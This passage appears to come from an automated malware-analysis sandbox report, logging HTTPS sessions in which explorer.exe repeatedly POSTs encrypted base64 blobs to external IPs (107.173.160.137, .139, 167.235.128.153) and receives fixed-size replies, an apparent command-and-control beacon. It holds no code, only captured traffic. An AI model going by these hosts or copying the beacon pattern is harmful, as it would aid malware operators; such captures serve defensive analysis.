                                                          2024-07-19 11:46:08 UTC685INData Raw: 4e 71 4a 4e 4a 66 66 7a 6c 50 51 70 31 31 39 58 35 35 70 74 59 2f 7a 5a 63 6f 30 50 4f 52 54 37 37 4c 6a 4e 4c 2f 2f 74 78 4e 75 79 43 34 55 42 4d 66 6e 65 65 6a 75 50 42 50 74 6c 48 53 7a 4f 30 2b 74 32 67 7a 30 56 61 49 78 66 63 38 6d 46 4f 38 44 65 53 35 6d 73 4b 6c 65 72 33 66 33 2f 6b 67 33 4d 4b 47 31 44 32 64 63 6c 61 31 70 50 61 53 53 43 50 6f 31 49 43 34 53 6e 6c 54 70 48 36 45 31 30 50 62 44 51 56 55 74 70 59 55 32 57 6a 74 44 6e 54 42 68 66 2f 6c 52 74 6f 67 30 51 56 57 34 51 65 61 4c 62 48 78 35 5a 5a 65 38 73 37 43 6b 68 56 5a 47 66 41 74 51 43 77 6a 5a 76 67 34 65 56 45 74 50 70 35 6b 50 45 45 6b 50 6e 4c 52 74 4f 49 42 6a 6f 64 4f 45 68 61 77 75 54 78 6c 57 78 46 51 39 49 57 77 4a 31 47 33 64 74 6d 4b 67 47 63 34 69 62 6b 55 57 36 46 75 56
                                                          Data Ascii: NqJNJffzlPQp119X55ptY/zZco0PORT77LjNL//txNuyC4UBMfneejuPBPtlHSzO0+t2gz0VaIxfc8mFO8DeS5msKler3f3/kg3MKG1D2dcla1pPaSSCPo1IC4SnlTpH6E10PbDQVUtpYU2WjtDnTBhf/lRtog0QVW4QeaLbHx5ZZe8s7CkhVZGfAtQCwjZvg4eVEtPp5kPEEkPnLRtOIBjodOEhawuTxlWxFQ9IWwJ1G3dtmKgGc4ibkUW6FuV


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          55192.168.2.557857107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:09 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:09 UTC1122OUTData Raw: 4f 73 35 49 41 39 51 4b 76 33 57 66 51 70 47 59 46 35 66 72 57 75 54 74 70 36 35 6c 35 77 44 51 66 67 63 47 69 30 4d 5a 47 2f 54 68 52 42 6c 78 4d 7a 75 78 5a 50 62 2f 6c 4d 31 32 78 35 33 39 74 41 2b 2f 7a 6f 67 6b 58 65 4b 6f 56 37 51 59 51 34 59 68 43 54 6c 50 57 6d 35 44 64 78 67 61 56 69 4a 73 33 56 6a 2f 52 2b 76 48 73 31 4e 37 46 49 57 4c 57 4c 61 31 52 6b 31 38 44 51 6d 56 63 69 47 61 53 70 6c 76 49 47 37 49 45 4c 32 55 42 57 68 56 39 49 34 5a 36 32 39 68 79 70 52 64 50 51 66 31 31 45 48 64 77 69 6c 47 78 73 31 65 35 6e 39 6a 6d 54 77 78 47 62 4e 62 58 65 41 54 57 68 48 41 49 67 57 65 72 4c 48 5a 75 31 38 51 77 66 68 4a 6e 6d 5a 71 34 36 57 2b 52 58 6c 4d 61 62 64 4e 68 76 77 66 35 69 6f 6c 69 52 6c 70 7a 65 53 31 75 46 33 6c 33 56 75 4d 73 44 76
                                                          Data Ascii: Os5IA9QKv3WfQpGYF5frWuTtp65l5wDQfgcGi0MZG/ThRBlxMzuxZPb/lM12x539tA+/zogkXeKoV7QYQ4YhCTlPWm5DdxgaViJs3Vj/R+vHs1N7FIWLWLa1Rk18DQmVciGaSplvIG7IEL2UBWhV9I4Z629hypRdPQf11EHdwilGxs1e5n9jmTwxGbNbXeATWhHAIgWerLHZu18QwfhJnmZq46W+RXlMabdNhvwf5ioliRlpzeS1uF3l3VuMsDv
                                                          2024-07-19 11:46:10 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:10 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:10 UTC685INData Raw: 7a 35 46 30 67 70 44 59 70 2f 32 61 30 49 38 6f 56 41 4c 78 33 63 67 4b 78 62 4e 78 4b 2f 56 41 34 42 46 6e 7a 67 72 68 32 56 73 79 31 44 76 71 39 6d 6d 4a 57 34 31 4f 37 41 65 57 2f 30 4a 48 30 35 59 54 55 5a 70 55 6e 34 54 59 51 39 57 77 57 6d 73 64 55 4e 65 56 46 44 2b 58 46 61 43 43 77 78 67 48 68 55 6d 6d 6b 46 73 38 4a 71 32 61 64 39 33 62 72 7a 57 57 79 4c 67 51 41 2b 52 39 64 61 4f 6b 36 71 42 59 32 37 4d 35 49 46 51 67 33 58 47 64 76 47 78 68 76 63 78 32 73 44 70 33 46 64 38 39 33 6c 74 2f 42 41 6f 72 76 42 44 47 71 50 49 64 71 74 72 35 42 6d 71 6f 43 6e 79 54 62 55 37 46 49 34 2f 2b 31 4a 33 6c 2b 5a 47 51 68 6f 43 6c 50 57 78 57 51 73 45 55 74 2f 37 71 38 32 36 43 74 51 39 62 61 74 69 30 56 4d 59 6e 42 70 53 47 76 35 4d 46 58 2b 4d 6a 4b 5a 54
                                                          Data Ascii: z5F0gpDYp/2a0I8oVALx3cgKxbNxK/VA4BFnzgrh2Vsy1Dvq9mmJW41O7AeW/0JH05YTUZpUn4TYQ9WwWmsdUNeVFD+XFaCCwxgHhUmmkFs8Jq2ad93brzWWyLgQA+R9daOk6qBY27M5IFQg3XGdvGxhvcx2sDp3Fd893lt/BAorvBDGqPIdqtr5BmqoCnyTbU7FI4/+1J3l+ZGQhoClPWxWQsEUt/7q826CtQ9bati0VMYnBpSGv5MFX+MjKZT


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          56192.168.2.557859107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:11 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:11 UTC1122OUTData Raw: 70 72 77 34 6a 4b 69 6f 4c 55 63 69 55 61 71 63 72 37 51 2b 6d 72 54 7a 4b 47 31 2f 4a 6a 76 2f 4e 4f 74 6c 30 4b 32 73 6e 43 69 57 6a 44 2b 44 64 5a 48 79 70 79 46 35 39 75 4b 46 6d 6e 67 75 74 6e 4c 46 42 41 6a 46 78 62 31 79 7a 6b 4d 58 66 2f 4f 6f 63 49 77 4d 30 44 6b 76 61 50 63 70 6e 45 46 4d 70 67 53 42 4f 70 71 66 63 35 35 2b 56 56 33 79 4c 30 30 52 75 5a 30 6c 44 57 32 77 6b 63 37 67 43 56 65 37 4b 68 55 32 58 2f 6e 32 65 45 68 72 4e 71 6f 69 75 4a 38 66 53 68 49 70 32 65 50 6f 30 30 49 50 61 63 62 63 30 33 51 70 56 66 51 47 48 6c 2f 5a 42 65 79 4e 61 31 59 69 50 36 6e 53 62 7a 43 4e 36 6e 74 72 50 2f 50 41 37 30 39 78 57 66 70 5a 6b 6d 63 75 70 72 67 39 31 30 65 55 50 51 78 47 78 2b 6c 67 69 58 53 50 31 4c 46 55 70 36 71 45 55 58 77 39 66 4f 31
                                                          Data Ascii: prw4jKioLUciUaqcr7Q+mrTzKG1/Jjv/NOtl0K2snCiWjD+DdZHypyF59uKFmngutnLFBAjFxb1yzkMXf/OocIwM0DkvaPcpnEFMpgSBOpqfc55+VV3yL00RuZ0lDW2wkc7gCVe7KhU2X/n2eEhrNqoiuJ8fShIp2ePo00IPacbc03QpVfQGHl/ZBeyNa1YiP6nSbzCN6ntrP/PA709xWfpZkmcuprg910eUPQxGx+lgiXSP1LFUp6qEUXw9fO1
                                                          2024-07-19 11:46:12 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:12 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:12 UTC685INData Raw: 42 72 76 6d 52 6b 54 49 30 72 52 70 45 73 73 67 55 36 41 47 33 51 57 4a 6c 46 6f 64 4e 47 75 6f 4e 73 7a 59 43 4a 67 7a 67 55 4b 64 53 58 4d 54 49 6d 51 42 39 2f 64 45 50 5a 41 32 38 49 53 4a 59 69 76 38 31 55 54 64 42 63 78 42 56 73 59 47 76 47 51 78 45 52 39 49 76 4c 57 53 54 69 63 72 54 45 79 37 64 54 6b 49 4b 32 44 72 59 59 73 67 76 37 44 42 31 4d 53 30 30 67 50 30 65 48 57 54 33 74 6a 46 79 79 6b 62 52 52 6e 65 64 35 46 72 69 67 34 53 6c 78 39 55 43 4d 35 47 4f 77 5a 4c 70 4e 52 68 56 41 76 6a 79 55 42 76 4b 45 30 56 42 58 57 38 4c 30 69 6a 6f 57 5a 74 52 74 79 41 76 72 48 6d 52 46 4f 78 78 34 49 6d 43 66 5a 73 4c 38 69 31 79 6f 6c 79 34 51 4c 43 56 53 7a 54 30 52 74 2f 57 47 31 6c 6f 63 53 74 55 6a 54 74 79 79 55 78 4b 65 58 49 64 43 72 45 4c 52 62
                                                          Data Ascii: BrvmRkTI0rRpEssgU6AG3QWJlFodNGuoNszYCJgzgUKdSXMTImQB9/dEPZA28ISJYiv81UTdBcxBVsYGvGQxER9IvLWSTicrTEy7dTkIK2DrYYsgv7DB1MS00gP0eHWT3tjFyykbRRned5Frig4Slx9UCM5GOwZLpNRhVAvjyUBvKE0VBXW8L0ijoWZtRtyAvrHmRFOxx4ImCfZsL8i1yoly4QLCVSzT0Rt/WG1locStUjTtyyUxKeXIdCrELRb


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          57192.168.2.557860167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:13 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:13 UTC1122OUTData Raw: 67 66 48 6c 32 62 72 67 73 2f 70 30 2b 71 6d 55 53 56 6a 6d 32 67 73 41 73 6a 7a 79 66 78 4a 43 62 42 70 4b 51 6a 61 44 31 37 6a 43 53 45 48 41 44 4d 4b 4c 2f 68 55 6a 51 43 4f 52 72 79 61 62 55 53 79 46 2b 78 54 4b 76 51 6c 55 30 58 77 47 66 5a 4d 63 6f 53 64 7a 2f 6f 51 2f 6e 6f 4a 55 53 36 39 52 33 71 66 44 43 65 48 41 55 54 47 53 4b 42 6b 35 75 7a 35 70 5a 67 64 2f 35 32 33 67 74 75 35 66 35 67 74 46 74 2b 30 62 34 69 4c 63 58 4c 54 76 49 43 50 48 51 56 31 34 38 4f 4b 6c 72 48 61 32 56 78 48 75 4a 4b 32 79 41 69 2f 4f 6e 2b 2b 38 50 55 69 69 44 6b 65 6c 36 41 4f 33 50 77 6f 36 2b 68 6d 62 57 67 6d 47 75 71 6c 46 4c 6f 53 66 34 6b 64 51 39 31 58 6d 53 65 63 48 6c 56 6a 4e 6e 55 66 64 44 54 66 43 75 4e 75 79 5a 43 6c 71 4f 6b 4f 53 75 59 75 77 70 36 61
                                                          Data Ascii: gfHl2brgs/p0+qmUSVjm2gsAsjzyfxJCbBpKQjaD17jCSEHADMKL/hUjQCORryabUSyF+xTKvQlU0XwGfZMcoSdz/oQ/noJUS69R3qfDCeHAUTGSKBk5uz5pZgd/523gtu5f5gtFt+0b4iLcXLTvICPHQV148OKlrHa2VxHuJK2yAi/On++8PUiiDkel6AO3Pwo6+hmbWgmGuqlFLoSf4kdQ91XmSecHlVjNnUfdDTfCuNuyZClqOkOSuYuwp6a
                                                          2024-07-19 11:46:14 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:14 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:14 UTC685INData Raw: 53 75 42 6b 42 77 78 48 71 77 7a 76 55 68 6c 44 35 77 37 43 63 6f 39 61 44 55 58 79 4a 72 76 7a 30 66 43 62 52 59 77 42 6c 44 38 36 6b 37 6c 33 5a 44 63 62 42 38 4a 77 67 71 6b 47 55 47 51 4b 7a 6e 4e 5a 4d 68 5a 37 71 74 43 39 38 56 76 4a 69 2b 47 2b 37 55 4d 75 2f 70 49 49 46 5a 59 63 63 6e 4c 44 55 68 76 55 6a 33 65 2f 52 59 33 61 6d 34 54 4c 2f 74 48 6e 67 46 39 39 53 51 73 41 6b 53 6f 48 35 47 30 38 69 70 59 36 4c 53 70 72 51 2b 6b 53 34 39 45 72 54 75 47 6d 39 51 6a 39 79 38 42 4f 52 4b 75 64 36 58 67 69 63 49 79 53 49 4a 30 56 47 6a 45 7a 44 31 5a 79 55 49 79 69 36 55 47 35 6f 39 58 41 48 6a 64 4a 31 71 7a 33 70 2f 31 57 71 35 69 7a 6d 4d 30 4e 37 4b 31 31 41 30 2f 50 73 54 31 72 47 70 6f 4d 39 68 42 65 6a 61 42 67 49 38 47 2f 47 52 52 6f 45 70 74
                                                          Data Ascii: SuBkBwxHqwzvUhlD5w7Cco9aDUXyJrvz0fCbRYwBlD86k7l3ZDcbB8JwgqkGUGQKznNZMhZ7qtC98VvJi+G+7UMu/pIIFZYccnLDUhvUj3e/RY3am4TL/tHngF99SQsAkSoH5G08ipY6LSprQ+kS49ErTuGm9Qj9y8BORKud6XgicIySIJ0VGjEzD1ZyUIyi6UG5o9XAHjdJ1qz3p/1Wq5izmM0N7K11A0/PsT1rGpoM9hBejaBgI8G/GRRoEpt


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          58192.168.2.557861107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:15 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:46:15 UTC1267OUTData Raw: 6e 45 4f 68 6f 6f 69 51 4a 49 50 31 73 30 6b 4d 6a 72 4f 44 71 54 38 42 76 52 44 48 35 4a 4b 53 45 59 49 4c 64 7a 6e 41 4f 35 63 74 44 30 72 67 4e 44 46 37 5a 4a 76 39 4e 37 65 62 77 67 36 2f 35 35 4c 70 59 76 63 6b 33 50 53 79 33 57 50 41 73 77 31 65 4b 76 35 76 42 4c 69 44 70 72 53 53 45 77 73 7a 39 55 50 4d 6c 72 78 7a 68 71 78 4f 62 31 53 54 72 48 2f 72 57 4f 62 30 75 2f 66 41 6b 62 31 32 61 4c 64 34 58 6d 2f 7a 6c 52 55 71 35 76 39 37 39 63 6a 59 50 4c 78 62 78 78 52 62 73 75 42 77 6d 68 48 44 69 62 31 37 33 62 52 4d 63 39 46 64 6d 58 43 43 55 34 48 69 70 4d 49 44 68 67 52 57 5a 31 4f 62 78 58 77 67 64 31 50 55 65 30 6a 49 55 72 59 70 4c 65 58 2f 58 67 65 63 33 70 41 38 71 62 30 38 65 6d 6f 6b 30 36 61 41 45 35 39 48 4d 4e 79 57 64 46 6d 70 7a 2f 6f
                                                          Data Ascii: nEOhooiQJIP1s0kMjrODqT8BvRDH5JKSEYILdznAO5ctD0rgNDF7ZJv9N7ebwg6/55LpYvck3PSy3WPAsw1eKv5vBLiDprSSEwsz9UPMlrxzhqxOb1STrH/rWOb0u/fAkb12aLd4Xm/zlRUq5v979cjYPLxbxxRbsuBwmhHDib173bRMc9FdmXCCU4HipMIDhgRWZ1ObxXwgd1PUe0jIUrYpLeX/Xgec3pA8qb08emok06aAE59HMNyWdFmpz/o
                                                          2024-07-19 11:46:16 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:16 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:16 UTC685INData Raw: 59 6d 64 41 5a 37 52 34 47 33 6c 64 59 53 59 6e 32 35 43 4c 65 46 5a 4c 6a 36 56 63 4b 42 70 65 45 67 4e 50 54 78 42 41 35 73 64 4a 68 43 67 33 7a 6b 50 67 4d 55 33 49 69 6b 64 6e 46 39 68 53 65 73 71 44 48 59 38 66 52 77 45 70 66 33 4d 64 4d 33 58 30 37 4c 48 43 6a 4f 52 57 53 31 71 41 58 57 54 6b 4b 71 78 41 66 68 75 73 63 47 57 57 64 71 6f 71 4d 36 6e 52 75 6a 50 70 6e 43 52 41 58 51 75 68 57 59 66 57 6f 6b 65 63 6e 72 44 43 47 4e 74 66 38 62 72 56 64 38 41 56 5a 35 50 4a 52 73 47 77 50 72 7a 57 54 6a 71 36 75 59 35 46 61 45 6b 75 5a 4d 6a 51 65 38 38 4c 38 6d 4b 72 4c 45 6d 68 37 34 59 77 39 2b 53 47 4e 4a 30 4a 74 4f 48 72 49 54 35 34 4f 79 55 5a 66 66 6a 41 69 32 67 75 4a 38 48 62 63 42 35 39 5a 52 2f 31 55 6b 53 32 34 71 37 5a 6f 52 65 6c 47 64 57
                                                          Data Ascii: YmdAZ7R4G3ldYSYn25CLeFZLj6VcKBpeEgNPTxBA5sdJhCg3zkPgMU3IikdnF9hSesqDHY8fRwEpf3MdM3X07LHCjORWS1qAXWTkKqxAfhuscGWWdqoqM6nRujPpnCRAXQuhWYfWokecnrDCGNtf8brVd8AVZ5PJRsGwPrzWTjq6uY5FaEkuZMjQe88L8mKrLEmh74Yw9+SGNJ0JtOHrIT54OyUZffjAi2guJ8HbcB59ZR/1UkS24q7ZoRelGdW


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          59192.168.2.557863107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:17 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:17 UTC1122OUTData Raw: 54 56 2b 45 36 49 6b 51 71 68 65 64 56 78 4e 4e 4c 35 6f 67 59 5a 47 4c 63 38 4f 74 37 34 70 45 4e 41 4e 49 4a 69 50 64 52 59 67 42 4b 65 69 4e 4e 61 69 2f 77 4d 37 72 66 41 4b 34 4e 76 78 6f 44 55 48 58 43 76 62 72 4d 47 66 73 42 6e 4f 4d 56 68 75 69 55 74 71 37 5a 39 43 45 57 68 31 2f 32 73 4d 55 76 64 70 35 2f 2f 75 66 6c 72 47 47 31 51 34 2b 64 69 77 68 59 48 48 65 39 35 70 45 7a 79 30 37 34 52 70 77 36 55 54 38 31 31 61 6c 41 57 48 55 46 6e 64 72 79 44 35 61 58 47 4c 58 6a 44 6a 74 44 56 70 61 65 5a 70 46 56 75 52 58 70 37 34 42 75 58 72 52 57 78 64 6f 2b 43 5a 56 64 72 73 78 5a 39 6c 73 36 52 2f 50 49 57 64 70 56 37 41 47 33 68 48 6a 36 6e 2b 53 45 5a 4e 47 33 39 52 62 55 35 6c 37 2b 62 75 36 4d 67 7a 4e 30 61 50 42 59 65 77 43 74 64 37 78 48 4d 34
                                                          Data Ascii: TV+E6IkQqhedVxNNL5ogYZGLc8Ot74pENANIJiPdRYgBKeiNNai/wM7rfAK4NvxoDUHXCvbrMGfsBnOMVhuiUtq7Z9CEWh1/2sMUvdp5//uflrGG1Q4+diwhYHHe95pEzy074Rpw6UT811alAWHUFndryD5aXGLXjDjtDVpaeZpFVuRXp74BuXrRWxdo+CZVdrsxZ9ls6R/PIWdpV7AG3hHj6n+SEZNG39RbU5l7+bu6MgzN0aPBYewCtd7xHM4
                                                          2024-07-19 11:46:18 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:18 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:18 UTC685INData Raw: 67 4f 49 31 41 46 77 66 55 4d 45 66 54 69 71 49 71 36 66 56 4a 44 70 51 68 2f 61 57 2b 6a 6b 4e 2b 2b 76 75 62 65 53 69 6a 34 71 34 63 77 72 4b 61 74 78 52 4e 7a 42 68 69 79 54 74 50 30 64 50 50 30 53 43 65 63 37 6d 57 41 61 6e 64 43 36 6d 70 4e 4a 57 69 65 5a 2f 43 31 59 42 58 30 79 4e 79 5a 57 4d 5a 32 44 77 37 34 33 34 65 50 34 4b 33 56 55 65 76 73 41 57 66 6e 65 72 51 72 4d 76 63 32 32 75 6b 4d 32 5a 4a 33 6f 4b 50 30 56 69 7a 77 62 68 2f 57 77 6a 73 41 53 6a 68 56 68 69 51 67 6d 57 50 6a 56 6e 48 74 39 35 74 54 32 6c 6d 49 4d 2f 4b 33 65 61 38 72 61 75 48 57 4c 42 65 5a 6d 62 71 33 38 32 63 4c 59 32 4e 6f 63 4a 44 51 6a 75 39 6a 39 59 66 4d 39 70 58 4d 68 6e 65 4a 4b 78 70 61 4c 35 31 47 71 7a 4d 79 48 5a 78 7a 42 65 68 37 2f 69 38 66 4a 43 62 45 62
                                                          Data Ascii: gOI1AFwfUMEfTiqIq6fVJDpQh/aW+jkN++vubeSij4q4cwrKatxRNzBhiyTtP0dPP0SCec7mWAandC6mpNJWieZ/C1YBX0yNyZWMZ2Dw7434eP4K3VUevsAWfnerQrMvc22ukM2ZJ3oKP0Vizwbh/WwjsASjhVhiQgmWPjVnHt95tT2lmIM/K3ea8rauHWLBeZmbq382cLY2NocJDQju9j9YfM9pXMhneJKxpaL51GqzMyHZxzBeh7/i8fJCbEb


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          60192.168.2.557864167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:19 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:19 UTC1122OUTData Raw: 68 66 34 61 2b 74 32 73 65 65 6c 36 59 6e 67 61 4a 6e 75 6f 43 52 76 63 79 32 55 6f 45 4e 59 2f 6e 62 68 56 4c 48 75 63 6d 71 44 58 59 4a 59 6d 79 4a 30 61 39 73 57 35 48 4a 45 75 6e 6d 4c 72 35 69 46 77 65 4d 32 77 64 54 4f 30 53 61 4a 6f 36 76 78 52 67 58 5a 73 4a 6a 47 41 4b 33 5a 2b 2f 6c 77 73 65 53 6b 78 6e 2b 6d 6e 36 68 4a 76 59 32 75 71 36 76 67 67 32 6a 56 34 75 54 48 61 53 69 46 7a 53 53 4b 5a 4b 4d 44 4d 35 54 77 78 50 43 35 47 61 46 2b 33 6e 76 62 4c 65 58 56 70 54 73 38 70 75 55 76 6f 39 4b 5a 2b 4b 63 47 2f 59 49 48 63 61 30 79 39 33 57 41 4a 48 35 76 49 4e 58 2b 52 78 61 77 61 76 30 42 35 45 55 65 42 7a 62 31 64 78 45 64 62 31 73 70 6a 52 69 39 4c 52 78 7a 45 72 50 2f 6f 4a 69 50 6b 4d 4c 61 59 31 52 79 49 75 38 56 36 42 62 70 65 47 6a 79
                                                          Data Ascii: hf4a+t2seel6YngaJnuoCRvcy2UoENY/nbhVLHucmqDXYJYmyJ0a9sW5HJEunmLr5iFweM2wdTO0SaJo6vxRgXZsJjGAK3Z+/lwseSkxn+mn6hJvY2uq6vgg2jV4uTHaSiFzSSKZKMDM5TwxPC5GaF+3nvbLeXVpTs8puUvo9KZ+KcG/YIHca0y93WAJH5vINX+Rxawav0B5EUeBzb1dxEdb1spjRi9LRxzErP/oJiPkMLaY1RyIu8V6BbpeGjy
                                                          2024-07-19 11:46:20 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:20 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:20 UTC685INData Raw: 30 30 6c 78 4a 34 69 2f 38 6d 44 6e 72 5a 42 59 7a 66 42 6c 76 70 63 54 47 34 61 33 78 4a 30 69 7a 75 59 30 32 6f 6c 4c 55 5a 78 31 78 69 54 5a 35 77 45 43 4b 6b 2f 38 4b 63 77 48 55 35 4a 38 59 49 7a 72 47 64 64 65 62 65 58 2f 4d 7a 4d 4e 72 62 77 50 44 6a 64 43 73 46 75 38 56 49 38 73 71 73 38 72 43 64 70 62 4c 4e 72 68 4e 41 6f 6e 44 50 4d 78 47 6e 52 6e 41 37 6f 55 72 70 75 32 70 74 6a 4c 2f 35 79 79 38 59 66 31 41 67 75 61 52 4e 30 65 7a 72 6a 37 64 73 2b 34 36 42 37 6d 71 78 30 72 42 44 56 5a 77 6c 6b 61 35 4f 30 42 54 50 52 4a 41 71 55 72 33 79 71 4c 78 6e 4c 47 47 58 51 63 77 6c 7a 74 36 53 52 50 4d 34 44 6d 73 33 42 67 61 47 78 63 50 58 41 38 50 37 48 35 6f 50 6c 37 73 4b 36 68 4f 77 44 56 53 5a 45 4f 65 76 49 33 35 78 52 4d 59 6e 63 41 51 68 75
                                                          Data Ascii: 00lxJ4i/8mDnrZBYzfBlvpcTG4a3xJ0izuY02olLUZx1xiTZ5wECKk/8KcwHU5J8YIzrGddebeX/MzMNrbwPDjdCsFu8VI8sqs8rCdpbLNrhNAonDPMxGnRnA7oUrpu2ptjL/5yy8Yf1AguaRN0ezrj7ds+46B7mqx0rBDVZwlka5O0BTPRJAqUr3yqLxnLGGXQcwlzt6SRPM4Dms3BgaGxcPXA8P7H5oPl7sK6hOwDVSZEOevI35xRMYncAQhu


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          61192.168.2.557865107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:21 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:46:21 UTC1267OUTData Raw: 4b 61 58 53 52 6c 75 43 66 69 79 43 6a 58 43 54 64 4d 51 44 30 51 66 73 6d 41 67 39 62 7a 63 67 75 44 47 5a 6e 73 4f 49 46 54 75 2b 77 54 41 32 34 2b 31 79 39 51 6b 38 76 46 43 30 6a 32 38 74 4b 45 70 4a 38 78 6a 52 71 69 6e 70 47 33 54 43 31 64 48 7a 53 5a 39 71 36 30 5a 78 61 74 47 30 65 52 79 6b 47 71 77 61 67 67 48 73 58 34 6d 49 66 45 68 65 6f 6c 50 77 4c 2f 42 77 39 49 57 66 33 77 52 63 38 44 31 43 43 4a 71 39 36 6e 39 73 74 44 4b 50 64 4f 52 36 36 41 66 52 5a 54 56 4e 34 31 56 69 4e 5a 67 44 37 33 4f 2b 79 73 50 5a 41 70 32 72 6f 38 66 55 37 54 4a 55 54 4c 41 44 6f 30 4a 2f 48 48 61 61 70 44 5a 35 6c 58 65 34 44 49 56 68 55 34 69 66 43 64 43 57 30 67 50 58 46 78 6c 42 65 31 4b 4f 35 2f 49 2f 52 47 35 5a 50 6a 72 70 4c 65 77 50 54 55 69 47 63 35 63
                                                          Data Ascii: KaXSRluCfiyCjXCTdMQD0QfsmAg9bzcguDGZnsOIFTu+wTA24+1y9Qk8vFC0j28tKEpJ8xjRqinpG3TC1dHzSZ9q60ZxatG0eRykGqwaggHsX4mIfEheolPwL/Bw9IWf3wRc8D1CCJq96n9stDKPdOR66AfRZTVN41ViNZgD73O+ysPZAp2ro8fU7TJUTLADo0J/HHaapDZ5lXe4DIVhU4ifCdCW0gPXFxlBe1KO5/I/RG5ZPjrpLewPTUiGc5c
                                                          2024-07-19 11:46:22 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:22 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
